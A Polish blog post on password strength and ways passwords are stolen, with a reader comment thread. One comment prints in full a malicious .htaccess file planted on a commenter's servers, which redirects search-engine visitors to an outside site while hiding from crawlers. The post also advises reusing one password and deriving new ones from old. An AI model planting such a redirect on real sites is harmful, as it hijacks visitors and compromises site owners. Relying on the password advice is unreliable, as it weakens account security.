Strona używa cookies (ciasteczek). Dowiedz się więcej o celu ich używania i zmianach ustawień. Korzystając ze strony wyrażasz zgodę na używanie cookies, zgodnie z aktualnymi ustawieniami przeglądarki.    X

Bezpieczeństwo w sieci - mocne hasło

Witam, o hasłach sporo ostatnio słychać, każdy ma inne zdanie i pisze o tym zagadnieniu z innej strony, więc ja także się dołączę i napiszę z innego o 90 stopni kąta widzenia na tą sprawę - bezpieczeństwa.

Wydaje Mi się, że to ja w sumie zacząłem całą serią o bezpieczeństwie haseł przez Moje ostatnie wpisy o bezpieczeństwie które skłoniły innych o napisanie czegoś o podobnej tematyce.

Dlaczego hasło powinno być mocne?

Im mocniejsze hasło, tym trudniej jest je złamać - tutaj bardzo liczy się długość i różnorodność hasła.

To wszystko jest dla bezpieczeństwa, aby uniemożliwić komuś niepowołany dostęp do naszych danych osobowych, kont internetowych, tajnych i poufnych danych.

Najszybciej łamane hasła są takie które zawierają się w słownikach językowych, dlatego należy unikać tworzenia hasła z wyrazów znajdujących się w powszechnym użytku.

Budujemy mocne hasło

Mocny "tajny klucz" powinien się składać z:- Małe i duże litery, najlepiej w losowej kolejności (np. tGIIEQEgiqkSGkhP) - Cyfry - Znaki z poza alfabetu np. takie jak _, -, $ - Długość dla mocnego hasła powinna być od 15 do 30 znaków - Nie znajdują się w nim wyrazy powszechnego użytku (słownikowe)

W momencie tworzenia hasła należy zapomnieć kiedy się urodziliśmy, jak nazywa się nasz Pies czy jak ma na drugie imię Żona czy któreś z dzieci - mocne hasło to takie z którym nie używamy publicznych danych.

Zapamiętujemy mocne hasło

Aby zapamiętać hasło wystarczy je codziennie wpisywać, jeżeli mamy taką możliwość to możemy mieć hasło przez krótki czas zapisane na kartce.

Można do for mieć to samo hasło, inne hasło serwerów, czy także do wszystkich kont pocztowych..

Jedną z metod tworzenia hasła jest także przekształcenie choć w połowie starego hasła tak aby wyszło nowe.

Sposoby odzyskania/złamania hasła

Tajne frazy można zdobyć/złamać na wiele sposobów:- Przechwycenie ciągu znaków z klawiatury gdy używany jest system windows - Przechwycona transmisja pakietowa w publicznej sieci WIFI (hotspot) - Metoda bruteforce czyli na siłę która dzieli się na: - Testowanie losowych ciągów znaków - Test słownikowy - Wyszukiwanie hasła w wielkich bazach danych ze skrótami

Samo zdobycie hasła w sieci publicznej jest bardzo proste ponieważ ludzie są głupi i bezmyślni - jak to co drugi polak mówi "a kto by potrafił przejąć moje hasło" co jest głupim i bezmyślnym założeniem.

A co jak sąsiad zajmuje się informatyką i potrafi przechwytywać pakiety? - Znamy sąsiada, on tego nie potrafi.

Może do sąsiada przyjechała daleka rodzina na kilka dni, gdzie jeden z młodzieńców bawi się w skanowanie naszej sieci wifi ponieważ imprezy rodzinne z reguły są nudne a młody człowiek jest biegły w szeroko pojętej informatyce?

Na rynku stoi tyle kamienic, barów, dziesiątki jak nie więcej ludzi używa bez przerwy WIFI - trudno by nie znalazła się osoba która potrafi przechwycić konto do facebooka.

Przyjechaliśmy na wakacje, po długim dniu wracamy do hotelu, włączamy pocztę - jednak zapewne Nasz sąsiad może nie otwierać poczty tylko czychać ze snifferem na Nas, a może zostawił laptopa na cały dzień z włączonym snifferem, później by tylko przefiltrował logi w celu znalezienia hasła.

Bazy danych ze skrótami

Gdy komuś uda się wykraść skrót MD5/SHA1/inny z naszego komputera lub serwera na którym mamy konto może on wtedy wpisać taki skrót do md5crack.com czy passcracking.com aby w ułamku sekundy przeszukać bazę danych milionów/miliardów haseł w poszukiwaniu naszego.

Całość opiera się o wielkie bazy danych z hasłami które są zapisane w postaci skrótu "zaszyfrowanej" i jawnej dzięki czemu wyszukiwanie hasła w bazie danych trwa ułamek sekundy.

Metoda bruteforce

Metoda bruteforce opiera się na generowaniu losowych ciągów znaków w nieskończoność dopóki skrót od wygenerowanego ciągu nie będzie równy skrótowi którego jawną postać ("niezaszyfrowane hasło") szukamy.

Mogą to być miliony czy nawet miliardy kombinacji w zależności od tego jak mocne jest hasło.

Proszę Sobie wyobrazić, że przedłużenie naszego hasła choć o jeden znak może spotęgować liczbę kombinacji potrzebnych do zdobycia naszego hasła.

Do metody bruteforce można zaliczyć także słowniki czy tablice tęczowe jakkolwiek chcemy to nazwać, jest to łączenie dowolnych słów powszechnego użytku w celu odnalezienia hasła. 

Komentarze

0 nowych
  #1 28.01.2011 21:09

Od 15 do 30 znaków? Bez danych publicznych oraz słów występujących w słowniku? Po prostu masakra jakaś. Nie mam pojęcia, jak wymyślić coś takiego, aby było zarazem w marę łatwe do zapamiętania...

webnull   9 #2 29.01.2011 13:56

@Zbj (niezalogowany) | 28.01.2011 21:09
No cóż, jakieś dwa dni temu wygenerowałem losowe hasło do serwera które ma od 15 do 18 znaków i już dzisiaj je znam na pamięć.

Jak widać da się.

StawikPiast   11 #3 29.01.2011 15:36

@Webnull

jak zwykle poplynales.

Co do twojego tekstu na temat hasla, to pomine, bo uwaazam ze sie mylisz, ale niech ci bedzie.

No ale tutaj to juz mijasz sie z prawda.

"- Przechwycenie ciągu znaków z klawiatury gdy używany jest system windows"

Rozumiem ze kozystajac z kazdego innego systemu niz Windows nie da sie odczytac znakow klawiatury wpisywanych przez uzytkownika? Tak?

  #4 29.01.2011 15:45

Człowieku, przeglądarka tu się liczy nie system, jak wejdziesz na stronę z odpowiednio spreparowanym kodem wykorzystującym lukę w przeglądarce to nic ci nie pomoże, kod wyssie hasełka i gotowe, i rola systemu tutaj jest bez znaczenia, tak się teraz kradnie hasła, działa to na wszystkich systemach, no chyba że masz antywirusa co to blokuje, jak nie masz to trudno.

Tormiasz   6 #5 29.01.2011 16:14

@Sławekn
Rozsądni nie przechowują haseł w przeglądarce ;)

  #6 29.01.2011 16:40

"Witam, o hasłach sporo ostatnio słychać(...)"
Normalnie nie ma co czytać, jakbyście się powściekali wszyscy naraz piszecie o tym samym, to nudne.

  #7 29.01.2011 16:47

@Tormiasz Rozsądni zmieniają hasła co jakiś czas,

Meszuge   16 #8 29.01.2011 16:54

Przechowywanie haseł w przeglądarkach wydaje się faktycznie dość naiwne, ale czy na pewno jest to rozwiązanie niebezpieczne i bezsensowne? Dlaczego?

Pytanie (wątpliwość) drugie: Norton Internet Security zawiera Sejf Tożsamości. Zakładam, że korzystanie z niego zabezpiecza przynajmniej przed oprogramowaniem przechwytującym znaki wpisywane z klawiatury, czy dobrze myślę? A w takim razie byłoby to rozwiązanie lepsze, niż wpisywanie hasła z pamięci, prawda?

I na koniec uwaga. Mnóstwo „miejsc” w sieci w ogóle nie umożliwia stosowania tak długich haseł. Jeśli dobrze pamiętam, hasło do Allegro może mieć maksymalnie 16 znaków. Częsta granica to 6-8 znaków.

januszek   19 #9 29.01.2011 18:07

Hehe, Autor moim zdaniem opowiada o początkach ery informacyjnej, kiedy wydawało się, że łamanie haseł jest li jedyną metodą ataku na informacje ;) Takie podejście spopularyzowały filmy fabularne (chyba pierwszy nastoletni David w filmie "War Games" z 1983 a drugim był John Connor hackujący metodą brute-force bankomat w "Terminatorze" w 1984). I faktycznie - na przełomie lat 80 i 90 brute force było zagrożeniem. Dziś taka metoda jest już historią informatyki z poprzedniej ery ale mimo to propaguje się userom używanie bezpiecznych haseł - jako najlepszą ochronę przed mitycznym włamaniem przez Johna Connora. Śmiech na sali proszę szanownego Państwa, śmiech na sali ;)

IV twierdzenie januszka o silnych hasłach: Zwykły użytkownik ma takie same szanse obrony przed zawodowym hackerem jak w walce na pięści przeciwko zawodowemu bokserowi ;)

ps. Czy tu ktoś jeszcze, oprócz Dziadka Meszuge pamięta "Hackers" z 1995 r, z Angeliną J? ;)

januszek   19 #10 29.01.2011 18:20

I potem taki jeden z drugi "uświadomiony" więc stosujący "bezpieczne" hasło korzysta z publicznego WiFi, loguje się na strony bez szyfrowania (więc jego super-mega-secure-hasło leci w eter w plain-txt), ściąga z torrentów keygeny (które kompilują mu w systemie keyloggery) i lata po stronach z "wesołymi obrazkami".

Gdybym to ja chciał poznać jak najwięcej (statystycznie) par loginów/haseł i adresów email różnych Zwykłych Userów to podszedłbym do sprawy inaczej. Ot, uruchomiłbym jakaś, wymagającą logowania, ale popularną stronę/usługę (najlepiej działająca na granicy prawa - czyli oferującej dostęp do warezu) i różne naiwne Hanie i naiwni Zenonowie same by mi wszystkie dane w formularzu logowania wpisali. Łącznie z tymi "bezpiecznymi" ;P

ps. webnull - napisałem swój wpis bo mnie lekko zirytował Dzień Bezpiecznego Hasła i strona bezpiecznehaslo.info - Twoje wpisy nie miały z tym nic wspólnego, sorry ;)

borzole   4 #11 29.01.2011 19:53

@Zbj
Mnemotechniki. Wymyślasz zabawne (dla Ciebie) zdanie z każdym znaczkiem. Jakby co wpisz Tony Buzan w google. Ani razu mi się nie udało zapamiętać długiego hasła :) choć raz zapamiętałem wyjebiście długą listę absurdalnych przedmiotów, czyli to jednak działa tylko leniwy jestem.

@StawikPiast
masz na myśli takie coś?
http://www.google.pl/search?q=keloger+javascript

@Sławekn
Nikt trzeźwo myślący nie zapisuje ważnych haseł w przeglądarce.

@januszek
"War Games", "Terminator", "Hackers" ...ej no, przecież to klasyki jak Casablanca. Każdy piernik to widział.
A poza tym ten tego z wijafi:
http://www.google.pl/search?q=ssh+proxy+firefox

Konfucjusz mówi: kto wybulił na mocną bramę, ten zapewne poskąpił na mury. A nie to król małp z bajki.

webnull   9 #12 29.01.2011 20:06

@StawikPiast
Wymień choć jeden program typu keylogger dla Linuksa czy {Free,Open,Net}BSD, cóż trudno prawda? Za to tutaj by zabrakło miejsca aby wypisać takie programy dla windows.

Cóż, żaden "haker" nie pisze keyloggerów pod Swój system.

webnull   9 #13 29.01.2011 20:07

@Sławekn
Wątpię aby "antywirus" miał dostęp do pamięci przeglądarki i mógł "łapać" wirusy.

PS. Ludzie jak to brzmi? "Antywirus" - pogromca duchów, "łapać wirusy" to w ogóle jakieś SCI-FI

webnull   9 #14 29.01.2011 20:13

@Meszuge
16 znaków to już nawet długie hasło, tylko warto w tym haśle jeszcze zastosować małe i duże litery oraz cyfry aby było ono mocne.

Do allegro można mieć 16 znakowe, a do serwera SSH 30 znakowe ;-)

  #15 29.01.2011 20:16

po co haslo skoro kazdy system ma w sobie uspione zobi?wystarczy aktywowac kasperskiego pl lub google chrom hasla som dla dzieci przyklat czysty system a po rozszerzeniah z natury slady zostajom w botah google kasperski ma3 luki i co zmien haslo to wyszukiwarka sle twe haslo gdzie?pomysl avast przypadkiem nieroznosi infekci? testujom i co karzde haslo to udawane bezpieczenstwo niema rzadnyh hasel to fikcja tester botnetu

  #16 29.01.2011 20:52

@webnull norton ma taki dodatek do przeglądarki, ze jak wchodzisz na niebezpieczną stronę to wyświetla czy na nią wejść czy nie, jest tam też coś do bezpiecznego przechowywania haseł, człowieku, pisz fakty, a nie bzdury, skoro nie wiesz jakie są zabezpieczenia w pakietach antywirusowych to po co piszesz głupoty. Dodatkowo można zainstalować dodatek WOT jak nie mamy antywirusa, i mamy podgląd które strony są z wirusami , a które nie, podnosi to znacznie poziom zabezpieczeń. Dziwię się że o tym nie wiedziałeś, no ale zawsze jest czas na naukę, jak działają i jakie są pakiety antywirusowe,

januszek   19 #17 29.01.2011 21:04

Sławekn: webnull jest z krwi i kości Unixowcem (sam tak o sobie napisał) więc uważa, że jego nie imają się żadne wirusy ;) Zapewne tak samo myśleli Ci goście od oprogramowania sterowników PLC Siemensa wykorzystywanych w słynnych już wirówkach... ;)

webnull   9 #18 29.01.2011 21:14

@januszek
Ciekawe, że Ci specjaliści używali windowsa - przejechali się.

webnull   9 #19 29.01.2011 21:15

@Sławekn
Taki dodatek to jedynie filtr anty phishingowy, taki sam można znaleźć od np. od Google *za darmo* i dla każdego systemu operacyjnego.

  #20 29.01.2011 21:34

No to jednak dalej nie łapiesz, to nie tylko filtr, ale coś zintegrowanego z firewallem, i całym systemem zabezpieczeń, dzięki temu skuteczność takiego dodatku jest dość spora i nie jest to zwykły sobie filtr anty phishingowy. Widać że z windowsa nie korzystasz, a piszesz coś co jest nie prawdą, ujmę to tak, nie używasz antywirusa i nie wiesz ja to wygląda, obecnie, teraz to wygląda jak bastion, kilka skanerów równolegle skanuje pc, i to nie w oparciu tylko o sygnatury, a o inteligentne odnajdywanie nowych zagrożeń. Wygląda to tak, ktoś chce mi się włamać firewall to wykrywa i antywirus się pyta co robić, czy zablokować dane połączenie, czy je przepuścić, system dość bezpieczny, a siedząc tylko na zwykłym koncie usera a nie na admina, mam pewność że nawet jak ktoś się włamie to nie przejmie systemu, a jak to zrobi to w 5 minut, przywracam z partycji recorvery system, gotowy do pracy i można powiedzieć to tak, wirus mi niestraszny.

wampir_   3 #21 29.01.2011 21:44

Najpierw piszesz o konieczności używania mocnego hasła, a potem piszesz o zupełnie innych metodach pozyskania tego hasła, gdzie nie ma znaczenia czy hasło jest mocne czy nie.

Poza tym nie uważam aby sensownym rozwiązaniem było: "- Małe i duże litery, najlepiej w losowej kolejności (np. tGIIEQEgiqkSGkhP)" w połączeniu z "- Długość dla mocnego hasła powinna być od 15 do 30 znaków". Wybacz ale nie zamierzam logować się codziennie na różne konta, w celu utrwalania sobie trudnego hasła.

I jeszcze jedno (już było o tym w którymś tekście o hasłach. Metody bruteforce nie w każdym przypadku są możliwe do zastosowania i generalnie powszechne są obecnie inne sposoby włamań na konta. Ale skoro masz potrzebę posiadania 30-znakowego hasła to mnie to nie przeszkadza...

StawikPiast   11 #22 29.01.2011 21:44

@webnull

prosze to jest keylogger pod linuxa

http://sourceforge.net/projects/lkl/

A co do hasel, to ludzie zapisuja na karteczkach proste hasla typu Maslo12 bo ich nie pamietaja, do tego maja ich 10 i wiecznie im sie myla a dzwonieni codziennie do IT zeby zresetowali ze 3 hasla jest niemile widziane. Dlatego wlasnie w firmach stosuje sie rozwiazania typu AD czyli pojedyncze logowanie i mam dostep do wszystkiego. Ulatwia to zarzadzanie bezpieczenstwem w firmie o wiele skuteczniej od dlugasnych hasel. Zazwyczaj wystarcza wtedy haslo 6-8 znakow z jednym znakiem specjalnym i co najlepsze sa to sieci bardzo bezpieczne.

floyd   15 #23 29.01.2011 21:49

Może przy okazji przedstawię swoją przygodę z hasłami. Mam kilka stron na rożnych serwerach płatnych i bezpłatnych oraz jedno 6 znakowe hasło (nie słownikowe) do wszystkich serwerów. Na serwery logowałem się przez Total Commander.
Kilka tygodni temu na wszystkich serwerach i w każdym katalogu pojawił się plik: .htaccesss i w efekcie nie można było wejść na żadną stronę. Na szczęście plik dało się usunąć i po zmianie hasła na 13 znakowe mam na razie spokój.
Dla ciekawych podaję zawartość tego pliku:
# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER}

^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|m

amma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(q\=cache\:).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$

http://bonusforall.net/cgi-bin/r.cgi?p=10003&i=acab238e&j=315&m=27eb...

STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo

anakkin   6 #24 29.01.2011 23:59

1. "90 stopni konta"
2. "Wydaje Mi się", "przez Moje ostatnie wpisy"

W tym momencie zwątpiłem i przestałem czytać... Prawdopodobnie niestety...

borzole   4 #25 30.01.2011 00:15

@StawikPiast
a teraz napisz, jak chcesz uruchomić i ukryć ten keylogger na linuksie, bez wiedzy właściciela?

kamil_w   11 #26 30.01.2011 01:22

Oj trochę w tym wpisie namieszałeś. Korzystanie z tablic tęczowych to metoda wstecznej inżynierii (podczas tworzenia hasła tworzony jest hash, a my idziemy od tyłu - wyciągamy hash i dopasowujemy do niego hasło), a nie brute force. Brute force to bezpośredni atak na hasło.

Czas potrzebny na złamanie hasła rośnie liniowo względem ilości znaków w haśle i wykładniczo względem złożoności hasła tak więc bardziej opłaca się stosować hasła złożone (np $3r@&cHl3b4?!) niż długie o małej złożoności (jadenarowerzeiwszystkomizwisa)


Co do filmu "hakerzy"... już wtedy Angelina mi się nie podobała.

kamil_w   11 #27 30.01.2011 01:26

Aha. Jak zapamiętać złożone hasło? Tworzyć hasła w stylu "emo", czyli:
nienawidzeszefa -> n!eN@w1d2ę5z3f@

  #28 30.01.2011 08:43

przecież np. obsługa globalnych skrótów klawiaturowych w środowisku graficznym działa jak keylogger, wiec każdy z was ma w pewnym sensie takowy razem z np. KDE , gnome. W końcu klawiatura jest zasobem współdzielonym, co oznacza, że dokładnie każda aplikacja może odczytać jej stan - co za tym idzie działać może działać jak keylogger.

  #29 30.01.2011 10:03

Pisz może wpisy o linuxie, bo te które dotyczą też windowsa ci nie wychodzą.

  #30 30.01.2011 10:13

@sebt:
Jak ktoś używa, a akurat to co ma funkcję odpowiedzialną za tworzenie, przechowywanie i używanie haseł, to chyba pasuje do tematyki ostatnich wpisów, nie sądzisz?
Sam używam Nortona na jednym z domowych komputerów i zawartego w nim sejfu tożsamości. Podobnie jak meszuge nie jestem pewien, jak wygląda poziom ochrony przed odczytywaniem ze schowka / bufora.

webnull   9 #31 30.01.2011 10:17

@floyd
Jesteś żywym dowodem na potrzebę tworzenia mocnego hasła ;-)

webnull   9 #32 30.01.2011 10:18

@kamil_w
To jakie stworzysz hasło i jak je zapamiętasz to w sumie już Twoja sprawa - każdy ma Swoją metodę dla Siebie najlepszą.

webnull   9 #33 30.01.2011 10:19

@anakkin
Odnośnie jedynki faktycznie fatalny błąd, musiało Mi się pomylić z kontem - tym chronionym hasłem ;-)

Odnośnie dwójki to ja piszę Mój/Moje/Twoje w stylu angielskim, to Mnie nie interesuje jakie macie na to zdanie.

webnull   9 #34 30.01.2011 10:20

@borzole
Dokładnie, to tylko eksperyment z tym keyloggerem a nie żywy przykład.

webnull   9 #35 30.01.2011 10:22

@oner
W banku jest potwierdzenie tranzakcji SMS'em dlatego ktoś kto zdobędzie Twoje dane będzie mógł jedynie przeglądać stan konta ;-)

przemek1234   7 #36 30.01.2011 10:43

Co do przechwytywania pakietów, przecież formularze logowania są przesyłane przez SSL. Co do samego bruteforce znalazłem kiedyś program CUMD5, który łamie MD5 metodą bruteforce, wykorzystując do obliczeń technologię CUDA od firmy nVidia, a to przyspiesza proces ;)

  #37 30.01.2011 11:36

@przemek1234 CUDA daje cuda.

hnt   5 #38 30.01.2011 13:33

Hasła są jak majtki:
1. Warto często zmieniać.
2. Nie zostawiamy ich byle gdzie.
3. Nie dajemy innym osobom :)

@przemek1234
Układy graficzne świetnie nadają się do tego typu zadań, miażdżąco przewyższając wydajnościowo CPU na tym polu.

anakkin   6 #39 30.01.2011 18:22

mimo wszystko:
2a. "Wydaje Mi się" - niech będzie; 'I think'
2b. "poprzez Moje ostatnie wpisy" - jakoś nie bardzo pasuje tutaj angielski odpowiednik: 'through my last entries'

SnajperskY   4 #40 31.01.2011 11:21

@webnull

Pojęcie hasła nie narodziło się wczoraj. Na ten temat powiedziano/napisano/wyryto w kamiennych tablicach już chyba wszystko. Obietnica innego (o 90 stopni) spojrzenia na tak oklepane zagadnienia pozostało obietnicą niespełnioną. Mam nieodparte wrażenie, że Twój wpis wykluł się wyłącznie jako efekt nieodpartej potrzeby dołączenia do grona osób mających swoje zdanie. Ot, temat chwilowo na czasie, trzeba "coś" naskrobać.

Mimo tego skupiłem się jednak na treści. Czytam o tym jak ważne jest bezpieczne hasło oraz (szczęśliwie) co kryje się pod tym pojęciem. Następnie z rozbrajająco szczerością oznajmiasz, że ludzie i tak są głupi, by zadbać kompleksowo o bezpieczeństwo. Pada pytanie, do kogo właściwie skierowany jest Twój wpis? Świadomy zagrożeń internauta potrafi przecież zadbać o swoje bezpieczeństwo. Tym samym nic nowego nie wyniesie po tej lekturze.

Mając już mocne hasło głupi człowiek dowiaduje się, że to nie koniec drogi. Zmęczony procesem zapamiętywania hasła prawdopodobnie mdleje na wieść o tym jak łatwo mu to hasło wykraść. Podajesz sześć sposobów pozyskania hasła, a o metodach obrony milczysz. Głupi człowiek sam sobie poradzi? Ponownie pytanie, do kogo skierowany jest ten tekst?

W sumie dobrze, że nie wspominasz o dobrym, w sensie bezpieczeństwa, nawyku częstego zmiany hasła. Głupi człowiek mógłby wtedy zejść na dobre ;)

Jeżeli Twoją intencją było zapoczątkowanie cyklu o bezpieczeństwie w sieci to należało o tym wspomnieć na wstępie. W przeciwnym razie wprowadzasz w błąd sprowadzając bezpieczeństwo do mocnego hasła.

"Można do for mieć to samo hasło, inne hasło do wszystkich serwerów też takie samo, czy do banków podobnie."

A po polsku?

"Wydaje Mi się, że to ja w sumie zacząłem całą serią o bezpieczeństwie haseł przez Moje ostatnie wpisy o bezpieczeństwie które skłoniły innych o napisanie czegoś o podobnej tematyce."

Nie przesadzasz? Nawet jeżeli to prawda, to jakie to ma znaczenie?

Dysponujesz wiedzą, którą chcesz się podzielić z innymi, ale nie rób tego na siłę. Ten wpis jest ewidentnie tego przykładem.

Pozdrawiam i życzę bardziej przemyślanych tekstów nie wynikających z potrzeby zaistnienia.

webnull   9 #41 31.01.2011 13:40

@SnajperskY
"Można do for mieć to samo hasło, inne hasło do wszystkich serwerów też takie samo, czy do banków podobnie."

Poprawione.

Tekst ma na celu uświadomić, że mocniejsze hasło jest trudniej złamać choć niema rzeczy niemożliwych.

Chyba źle rozumujesz.

SnajperskY   4 #42 31.01.2011 15:07

@webnull

Wybacz, ale moje zrozumienie tekstu jest tak dobre jak dobry jest przekaz.

Twój wpis można spokojnie podzielić na dwa osobne traktujące o bezpiecznym haśle oraz sposobach jego przechwycenia. A wyszło tak, że do pierwszego tematu przyłożyłeś więcej uwagi, a drugi, choć bardziej interesujący, został potraktowany po macoszemu.

Liczę na rozwinięcie wątku p.t. "Sposoby odzyskania/złamania hasła oraz skuteczne metody obrony".

Pirks4   3 #43 31.01.2011 21:43

Po co konstruować hasło, skoro można je wygenerować? Hasła powinny być losowe. Takie losowo wygenerowane są bezpieczniejsze.
Wydaje mi się, ze w tych artykułach jest wymieszanie dwóch rzeczy:siły hasła samej w sobie oraz, nie wiem jak to nazwać: przechowywania poufnych danych, procedur bezpiecznego logowania, szyfrowania.
Wydaje się, ze dla przechowywania naprawdę ważnych haseł warto używać programów, które je losowo generują, szyfrują i bezpiecznie przechowują.
Przyszła mi do głowy jeszcze taka myśl: hasło bez wątpienia bezpieczne( z punktu widzenia jego siły) w praktyce może takie nie być. Bo jest trudne do zapamiętania, trzeba je gdzieś zapisywać i to jest jego słabość.

webnull   9 #44 01.02.2011 15:07

@Pirks4
Dokładnie.

webnull   9 #45 02.02.2011 22:28

@Pirks4
"Przyszła mi do głowy jeszcze taka myśl: hasło bez wątpienia bezpieczne( z punktu widzenia jego siły) w praktyce może takie nie być. Bo jest trudne do zapamiętania, trzeba je gdzieś zapisywać i to jest jego słabość."

Fakt, choć takie fizyczne zapisanie na kartce nie jest często tak niebezpieczne jak elektroniczne gdzieś w pliku tekstowym bo w sumie np. w domu ograniczona grupa ludzi ma dostęp do takiej kartki.

997   5 #46 03.02.2011 14:19

Ja mam nieco inne doświadczenie z hasłami. Mam do czynienia z masą zwykłych użytkowników i masą zwykłych haseł... Niestety polityka firmy odnośnie bezpieczeństwa jest nieco dziwna i męcząca, a przy tym chyba najmniej ważna dla szefostwa ;)

Jest pewien program, do którego część pracowników ma dostęp. Aby się dostać do właściwej aplikacji potrzebne są 3 hasła. Dwa z nich muszą być zmieniane co miesiąc i nie mogą się powtarzać przez 5 cykli, czyli jak masz hasło np. wacek, to kolejny raz to hasło możesz ustawić dopiero za 6 razem.

Wyobraźcie sobie teraz jak to wygląda w rzeczywistości. Pani sobie zapisuje wszystkie hasła na biurku bo nie ma siły ich co chwilę zapamiętywać, dodatkowo do każdego po prostu dopisuje kolejną liczbę czyli np. wacek123.

Próbowałem tłumaczyć, że ta częstotliwość zmiany haseł jest za duża, ponadto można spokojnie pominąć 2 spośród 3 haseł, no ale szef wie przecież lepiej ;)

webnull   9 #47 03.02.2011 16:11

@997
Fakt, sytuacja wygląda dziwnie - głupota jest po obu stronach czyli po stronie szefa, że każe używać 3 haseł zmienianych co miesiąc a także po stronie pracownika/klienta który dodaje cyferkę do starego hasła tworząc tym samym "nowe" hasło ;-)

wlodek57   1 #48 14.08.2011 19:31

witam wszystkich!
mam problem , zablokowałem sobie pocztę na o2 czy jest jakiś program który może rozszyfrować hasło.mam odzyskiwanie hasła na s.m.s ale nie wiem czy to bezpieczne ponieważ przysłali mi z o2 abym przysłał im takie oświadczenieWitam

W takim wypadku, aby zmienić hasło do poczty, proszę wypełnić poniższe oświadczenie:

http://c.firma.o2.pl/cf734/684f1bbb002a63e54b7562e4/zmiana_hasla_poczta

ale to mało :
Do formularza należy dołączyć kserokopię dowodu osobistego.
Proszę pamiętać iż podpis na wniosku musi być zgodny z podpisem na dowodzie osobistym.
Proszę również się upewnić czy dowód osobisty jest czytelny.
Dowód osobisty można powiększyć i rozjaśnić. Jeżeli jesteś osobą niepełnoletnią,
formularz musi wypełnić Twój opiekun prawny, załączając ksero dowodu osobistego oraz
swój podpis

i odesłać zwrotnie Pocztą Polską na adres:....

teraz dużo się słyszy o ludziach którzy oszukują biorą pożyczki pieniężne na dowód przez s.m.s i jestem bardzo ciekaw czy już ktoś korzystał z tej formy odzyskiwania hasła ?
z poważaniem

webnull   9 #49 15.08.2011 17:31

@wlodek57 | 14.08.2011 18:48
Myślę, że to nie jest oszustwo. Następnym razem załóż sobie pocztę na gmailu :-)